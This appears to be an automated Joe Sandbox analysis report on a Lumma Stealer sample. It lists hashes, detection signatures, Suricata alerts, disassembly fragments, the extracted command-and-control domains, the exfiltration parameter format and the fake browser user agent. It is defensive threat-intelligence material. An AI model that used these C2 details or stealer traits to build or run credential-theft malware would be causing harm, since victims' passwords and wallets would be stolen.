Edit tour

Windows Analysis Report
DPlvBkg4aj.exe

Overview

General Information

Sample name:	DPlvBkg4aj.exe renamed because original name is a hash value
Original sample name:	055bf072e4fa602afb77f598390a4dd6.exe
Analysis ID:	1586487
MD5:	055bf072e4fa602afb77f598390a4dd6
SHA1:	4270193f1a3b2a857c4f47ce0932c66e0114af15
SHA256:	919c790858137accb667129e41d2f2faef350df995c80130b2b866837ff93235
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DPlvBkg4aj.exe (PID: 1068 cmdline: "C:\Users\user\Desktop\DPlvBkg4aj.exe" MD5: 055BF072E4FA602AFB77F598390A4DD6)

WerFault.exe (PID: 5332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1788 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crowdwarek.shop", "skidjazzyric.click", "robinsharez.shop", "apporholis.shop", "femalsabler.shop", "chipdonkeruz.shop", "versersleep.shop", "handscreamny.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1418:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DPlvBkg4aj.exe PID: 1068	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: DPlvBkg4aj.exe PID: 1068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DPlvBkg4aj.exe PID: 1068	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:13:26.009314+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-09T08:13:27.163810+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-09T08:13:28.296133+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.112.1	443	TCP
2025-01-09T08:13:29.507462+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.112.1	443	TCP
2025-01-09T08:13:30.973085+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:13:26.695806+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-09T08:13:27.605817+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:13:26.695806+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:13:27.605817+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.112.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T08:13:28.914230+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.112.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DPlvBkg4aj.exe

Avira: detected

Antivirus detection for URL or domain

Source: soundtappysk.shop	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/	Avira URL Cloud: Label: malware
Source: apporholis.shop	Avira URL Cloud: Label: malware
Source: versersleep.shop	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/api	Avira URL Cloud: Label: malware
Source: robinsharez.shop	Avira URL Cloud: Label: malware
Source: crowdwarek.shop	Avira URL Cloud: Label: malware
Source: skidjazzyric.click	Avira URL Cloud: Label: malware
Source: chipdonkeruz.shop	Avira URL Cloud: Label: malware
Source: handscreamny.shop	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click/apix	Avira URL Cloud: Label: malware
Source: femalsabler.shop	Avira URL Cloud: Label: malware
Source: https://skidjazzyric.click:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.DPlvBkg4aj.exe.2150000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["crowdwarek.shop", "skidjazzyric.click", "robinsharez.shop", "apporholis.shop", "femalsabler.shop", "chipdonkeruz.shop", "versersleep.shop", "handscreamny.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: DPlvBkg4aj.exe	ReversingLabs: Detection: 50%
Source: DPlvBkg4aj.exe	Virustotal: Detection: 52%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: DPlvBkg4aj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skidjazzyric.click
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1699966752.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_00415720 CryptUnprotectData,

0_2_00415720

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Unpacked PE file: 0.2.DPlvBkg4aj.exe.400000.0.unpack

Source: DPlvBkg4aj.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	0_2_0043B870
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov edx, ecx	0_2_0043B870
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	0_2_0041BBA0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov esi, ecx	0_2_00415720
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_00415720
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_2_00419840
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	0_2_0040A05C
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00427070
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042D830
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_0043F0E0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B882
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then jmp eax	0_2_004418A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B173
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0042B170
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041A900
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041B184
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then test esi, esi	0_2_0043C9A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_0041B243
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EA62
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00402210
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_0040AA32
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	0_2_00425AF0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_00428280
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0041F2A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, edx	0_2_0040B2B0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebx, eax	0_2_00405AB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebp, eax	0_2_00405AB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EB5F
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042BB00
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041BB21
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441B20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041AB2A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	0_2_0040C334
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]	0_2_0040C3EC
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebx, edx	0_2_0042DBF0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then jmp ecx	0_2_0040D334
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00422380
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	0_2_0042BBA0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EBA1
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_00440BAB
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042EBB3
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441BB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_00441C40
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_00442470
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00426C76
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov eax, edi	0_2_0041C400
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00417405
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	0_2_00417405
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov edx, ecx	0_2_00417405
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00414C20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	0_2_0044042D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_0044042D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041B484
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_00427490
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00425D6A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00438520
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	0_2_00442D20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then push edi	0_2_0043C5A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	0_2_0043C5A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0042B652
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0041B667
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	0_2_00418672
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00409E09
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00407620
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00407620
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then jmp ecx	0_2_0040CEC7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	0_2_00416ED0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	0_2_0041BEE1
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041AEFF
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	0_2_0040DFE2
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0040DFE2
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	0_2_00408F90
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	0_2_004427B0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0066A070
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov esi, ecx	0_2_006760EF
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0067B166
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]	0_2_0067C148
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then jmp ecx	0_2_0066D12E
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]	0_2_00677137
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [esp+14h], 00000000h	0_2_006A21EA
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]	0_2_006691F7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]	0_2_0066E249
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0066E249
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	0_2_0066A2C3
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_0069F347
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0067B3EB
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0067B3DA
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00662477
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_006884E7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_0067B4AA
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0067F507
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_006825E7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]	0_2_0066C59B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov eax, edi	0_2_0067C667
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then jmp ecx	0_2_0066D59B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0067B6EB
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_006876F7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_006A26D7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h	0_2_006A0694
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_006A0694
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0067773F
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00698787
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, dword ptr [0044C548h]	0_2_00678809
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then push edi	0_2_0069C807
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]	0_2_0069C807
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_006758FA
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_0068B8B5
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00667887
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00667887
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, edx	0_2_0066BA6C
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	0_2_006A2A17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]	0_2_00677AE4
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov edx, ecx	0_2_00677AE4
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0067BAE9
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [esp+3Ch], edx	0_2_0069BAD7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov edx, ecx	0_2_0069BAD7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_2_00679AA7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0068DA97
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0067AB67
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_00686BA7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then jmp eax	0_2_006A1C3E
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then test esi, esi	0_2_0069CC07
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0068ECC9
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_0066AC99
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0068BD67
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]	0_2_00685D57
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebx, eax	0_2_00665D17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebp, eax	0_2_00665D17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_00676D15
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0068EDC6
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0067BD88
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0067AD91
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ebx, edx	0_2_0068DE57
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]	0_2_0067BE2C
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0068EE08
